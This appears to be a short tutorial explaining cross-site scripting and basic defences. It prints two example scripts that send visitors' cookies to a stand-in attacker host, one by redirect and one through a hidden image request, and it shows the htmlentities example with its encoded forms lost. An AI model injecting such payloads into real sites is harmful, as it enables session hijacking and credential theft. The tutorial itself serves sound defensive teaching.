XSS Attacks
XSS, or Cross Site Scripting Attacks, are attacks aimed at identity theft and stealing passwords from the users of a website (and sometimes more). XSS attacks do not threat directly the database like SQL injections do, but threat all users, especially admins that have high privileges in operating a website.
A Cross Site Scripting attack consists of inserting usually Javascript code, into any content that will be presented to the users, like in Blogs, Forums, Comments, etc... By inserting such malicious Javascript code, they can effectively "hijack" user's browser with Javascript and perform attack, usually without user's knowledge.
Most often, XSS attacks steal data from cookies. A valid browser, and a properly set cookie, will send a cookie only to the domain from where it was set. Combine this with the fact that cookies are used to pass user authentication data, sometimes even passwords, and especially session data since. Therefore Javascript is used to fetch local cookies aimed at the domain in question, and to send them to a third party domain - the attacker's domain - where the attacker can read its contents.
For example, an XSS attack can insert the following code inside a forum post, or blog comment post. It will not be visible to users (unless they look at the page source):
<script>
document.location = 'http://attackers.domain.com/somescript.php?cookies=' + document.cookie;
</script>
Now, let's see what happens here. The script routes your browser to the attacker's domain, and in the URL request passes local cookie data to a remote script on the attacker's server. The script receives the cookie data, and the attacker can view its contents.
Of course, the above example is visible, since your browser is suddenly directed to a third-party website. However, a clever attacker can wrap the URL request inside <img> tag, and remote (attacker's) server will return a valid image, but will also receive the cookie data in the image request:
Code:
<script>
document.getElementById('some_div').innerHTML= '<img src="http://attackers.domain.com/somescript.php?cookies=' + document.cookie + ' />';
</script>
And there you go, the user's cookie data is sent to the attacker. Now, if the user is admin, and cookies contained session data, and/or passwords or usernames, a great deal of damage can be done if the attacker gets hold of admin's password.
In order to protect your site against XSS attacks, you need to filter all input. Wherever there is some string data that will be presented back to users (usernames, forum posts, blog posts, comments, etc...) you need to filter that data. The most simple filtering against XSS is to encode all HTML entities, where < becomes <, > becomes > and browsers will not parse any tags inside them as valid HTML tags that would enable Javascript. PHP has one very useful little function for that, namely the htmlentities().
More complex filtering involves solving for character encoding hacks, pre-escaped characters that with additional escaping revert to HTML tags, writing routines that seek out malicious script combinations, etc...
In addition to input filtering, make sure your cookies do not carry any sensitive data, like passwords or usernames.
As a test, to check out if your filtering is moderately sufficient, try to insert something like this:
Code:
<script>
alert("This is XSS!");
</script>
